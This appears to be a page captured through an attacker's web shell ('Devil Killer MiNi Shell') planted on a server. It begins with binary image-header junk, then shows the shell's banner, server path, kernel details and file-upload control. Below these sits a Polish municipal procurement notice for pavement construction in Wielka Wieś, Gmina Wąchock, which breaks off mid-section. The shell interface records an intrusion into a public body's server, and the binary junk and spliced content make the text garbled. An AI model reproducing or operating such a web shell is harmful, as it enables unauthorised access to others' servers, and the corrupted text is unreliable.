JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/0023679201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa chodnika od nr 342 do WDK w Wielkiej Wsi, Gmina Wąchock” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WĄCHOCK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009930</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wielkowiejska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wąchock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-215</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">041 27-36-130</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wachock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gmina.wachock.sisco.info</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa chodnika od nr 342 do WDK w Wielkiej Wsi, Gmina Wąchock” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04b59b9e-0bb1-4a4b-831d-6b3d7e7a52d4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00236792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00139813/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa chodnika od nr 342 do WDK w Wielkiej Wsi, Gmina Wąchock</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wachock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Ilekroć w dalszej części Specyfikacji Warunków Zamówienia (SWZ) jest mowa <br/>o „Platformie Zakupowej”, „platformie zakupowej”, „Platformie zakupowej”, „platformie Zakupowej”, „Platformie eZamawiający”, „platformie eZamawiający”, „Platformie”, „platformie”, „Systemie” lub „systemie” (odmienione w odpowiedniej liczbie i przypadku) – należy przez to rozumieć narzędzie umożliwiające realizację procesu związanego <br/>z udzielaniem zamówień publicznych w formie elektronicznej służące w szczególności do przekazywania ofert, oświadczeń a także innych dokumentów w postępowaniu o udzielenie zamówienia publicznego, dostępne pod adresem https://wachock.ezamawiajacy.pl.<br/>W pozostałym zakresie zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.	Zamawiający, zgodnie z art. 67 i 281 ust. 1 pkt 8) PZP a także §§ 11 i 12 rozporządzenia elektronicznego, określa dopuszczalny format podpisu elektronicznego, jako:<br/>a.	dokumenty w formacie PDF zaleca się podpisywać formatem PAdES;<br/>b.	dokumenty w formacie innym niż PDF – wymagany jest oddzielny plik z podpisem. <br/>W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>13.	Zamawiający, zgodnie z art. 67 w zw. z art. 266 oraz art. 281 ust. 1 pkt 8) PZP a także §§ 11 i 12 rozporządzenia elektronicznego, określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>a.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b.	komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>c.	zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta (najlepiej w najnowszej wersji) obsługująca TLS 1.2;<br/>d.	włączona obsługa JavaScript;<br/>e.	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie PDF.<br/>W pozostałym zakresie zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 19 ust. 1 PZP oraz art. 13 ust. 1 i 2 RODO Zamawiający informuje, że:<br/>1)	Administratorem Pani/Pana danych osobowych (ADO) jest Burmistrz Miasta i Gminy Wąchock, ul. Wielkowiejska 1, 27-215 Wąchock, tel. (+48) 41 – 27 – 36 – 130<br/>2)	Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta i Gminy w Wąchocku jest Pani Milena Markiewicz-Jurzyńska; e-mail: iod@wachock.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie: <br/>a)	art. 6 ust. 1 lit. a RODO na podstawie Pani/Pana zgody;<br/>b)	art. 6 ust. 1 lit. b RODO w celu wykonania i na podstawie umowy, gdy ją zawarto;<br/>c)	art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem <br/>o udzielenie zamówienia publicznego;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 ustawy Pzp; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania, zgodnie z art. 78 ust. 4 ustawy Pzp, obejmuje cały czas trwania umowy);<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia; <br/>d)	na podstawie art. 77 RODO prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie przez ADO danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO.<br/>W pozostałym zakresie zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 1 PZP oraz art. 13 ust. 1 i 2 RODO Zamawiający informuje, że:<br/>1)	Administratorem Pani/Pana danych osobowych (ADO) jest Burmistrz Miasta i Gminy Wąchock, ul. Wielkowiejska 1, 27-215 Wąchock, tel. (+48) 41 – 27 – 36 – 130<br/>2)	Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta i Gminy w Wąchocku jest Pani Milena Markiewicz-Jurzyńska; e-mail: iod@wachock.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie: <br/>a)	art. 6 ust. 1 lit. a RODO na podstawie Pani/Pana zgody;<br/>b)	art. 6 ust. 1 lit. b RODO w celu wykonania i na podstawie umowy, gdy ją zawarto;<br/>c)	art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem <br/>o udzielenie zamówienia publicznego;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz 74 ustawy Pzp; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania, zgodnie z art. 78 ust. 4 ustawy Pzp, obejmuje cały czas trwania umowy);<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia; <br/>d)	na podstawie art. 77 RODO prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie przez ADO danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO.<br/>W pozostałym zakresie zgodnie z SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGK.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Szczegółowy opis przedmiotu zamówienia<br/>Przedmiot zamówienia obejmuje wykonanie zadania pn. „Budowa chodnika od nr 342 do WDK <br/>w Wielkiej Wsi, Gmina Wąchock”. Zgodnie z art. 103 ust. 1 PZP: Zamówienia na roboty budowlane opisuje się za pomocą dokumentacji projektowej oraz specyfikacji technicznych wykonania i odbioru robót budowlanych. Szczegółowy zakres remontu oraz czynności wynika <br/>z załączników nr 2, 10 do Specyfikacji Warunków Zamówienia (SWZ).<br/>W przypadku, gdyby wystąpiła konieczność wykonania prac tymczasowych , robót tymczasowych1 lub robót podstawowych1, niewymienionych expressis verbis w Specyfikacji Warunków Zamówienia (SWZ), załącznikach do Specyfikacji Warunków Zamówienia (SWZ) lub innych dokumentach zamówienia – ich koszt obciąża Wykonawcę. Wykonawca winien uwzględnić takie prace lub roboty przy wycenie.<br/>W pozostałym zakresie zgodnie z SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111230-9 - Roboty w zakresie stabilizacji gruntu</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233300-2 - Fundamentowanie autostrad, dróg, ulic i ścieżek ruchu pieszego</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45316213-1 - Instalowanie oznakowania drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przewiduje następujące kryteria oceny ofert:<br/>	cena oferty brutto (COB) – 60,00 pkt;<br/>	okres gwarancji i rękojmi (OGR) – 30,00 pkt;<br/>	kara umowna za zwłokę w realizacji zamówienia (KUZ) – 10,00 pkt;<br/>Maksymalna łączna liczba punktów do uzyskania w postępowaniu wynosi 100,00 pkt.<br/><br/>Ad. 1.<br/>Cenę oferty brutto podaje się w Formularzu oferty – załączniku nr 1 do Specyfikacji Warunków Zamówienia (SWZ).<br/>W kryterium cenowym zastosowanie będzie miał następujący wzór na obliczenie ilości przyznanych punktów:<br/>〖COB〗_i=(najniższa cena brutto spośród ofert niepodlegających odrzuceniu)/(cena brutto ofrety badanej) x 60<br/>Punkty otrzymane w tym kryterium Zamawiający obliczy z dokładnością do dwóch miejsc po przecinku, zaokrąglając je zgodnie z zasadami matematyki.<br/>Ad. 2 <br/>Okres gwarancji i rękojmi należy wpisać w pkt 16 załącznika nr 1 do Specyfikacji Warunków Zamówienia (SWZ).<br/>W kryterium okres gwarancji i rękojmi punkty będą przyznawane wg następującego schematu:<br/>Zaoferowany w Formularzu oferty okres gwarancji i rękojmi	Liczba punktów w kryterium OGR<br/>mniej niż 60 miesięcy	0<br/>60 miesięcy	10<br/>72 miesięcy	20<br/>84 miesiące	30<br/>Wpisanie jakiejkolwiek innej liczby nie będącej wielokrotnością liczby 12 miesięcy spowoduje otrzymanie 0 pkt w tym kryterium. Wpisanie liczby większej niż 84 miesiące, stanowiącej wielokrotność 12 miesięcy, będzie skutkowało przyznaniem największej liczby punktów (30 pkt). Niezaoferowanie żadnego okresu gwarancji będzie skutkowało odrzuceniem oferty przez Zamawiającego. <br/>Ad. 3<br/>Wysokość kary umownej za zwłokę w realizacji zamówienia należy wpisać w pkt 17 załącznika <br/>nr 1 do Specyfikacji Warunków Zamówienia (SWZ).<br/>W kryterium wysokość kary umownej za zwłokę w realizacji zamówienia punkty będą przyznawane wg następującego schematu:<br/>Zaoferowana w Formularzu oferty wysokość kary umownej za zwłokę w realizacji zamówienia	Liczba punktów w kryterium KUZ<br/>mniej niż 0,2 %	0<br/>0,2 %	2<br/>0,3 %	5<br/>0,4 %	10<br/>Wpisanie jakiejkolwiek innej liczby nie będącej wielokrotnością liczby 0,1 % kary umownej za zwłokę w realizacji zamówienia oznacza otrzymanie 0 pkt w tym kryterium. Wpisanie liczby większej niż 0,4 %, stanowiącej wielokrotność liczby 0,1%, będzie skutkowało przyznaniem największej liczby punktów (10 pkt). Zaoferowanie kary umownej w wysokości mniejszej niż 0,2% oznacza odrzucenie oferty przez Zamawiającego.<br/><br/> <br/>Liczba punktów łączna uzyskana przez i-tego Wykonawcę (P_i) stanowi sumę punktów uzyskanych w każdym z ww. kryteriów, zgodnie ze wzorem:<br/>P_i=〖COB〗_i+〖OGR〗_i+〖KUZ〗_i<br/>W powyższym wzorze poszczególne określenia oznaczają:<br/>	P_i - łączna ilość punktów uzyskana przez i-tego Wykonawcę;<br/>	〖COB〗_i - liczba punktów uzyskana przez i-tego Wykonawcę w kryterium cena oferty brutto;<br/>	〖OGR〗_i - liczba punktów uzyskana przez i-tego Wykonawcę w kryterium okres gwarancji <br/>i rękojmi;<br/>	〖KUZ〗_i - liczba punktów uzyskana przez i-tego Wykonawcę w kryterium wysokość kary umownej za zwłokę w realizacji zamówienia.<br/><br/>W przypadku, gdy dwie lub więcej ofert uzyska taką samą liczbę punktów łączną Zamawiający dokona ponownego przeliczenia punktów w kryterium ceny oferty brutto i zaokrągli otrzymane liczby punktów w tym kryterium do trzech miejsc po przecinku, zgodnie z zasadami matematyki. Gdyby i ten sposób klasyfikacji nie przyniósł rozstrzygnięcia – Zamawiający wybierze ofertę złożoną wcześniej w postępowaniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kara umowna za zwłoke w realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> A.	Warunki udziału w 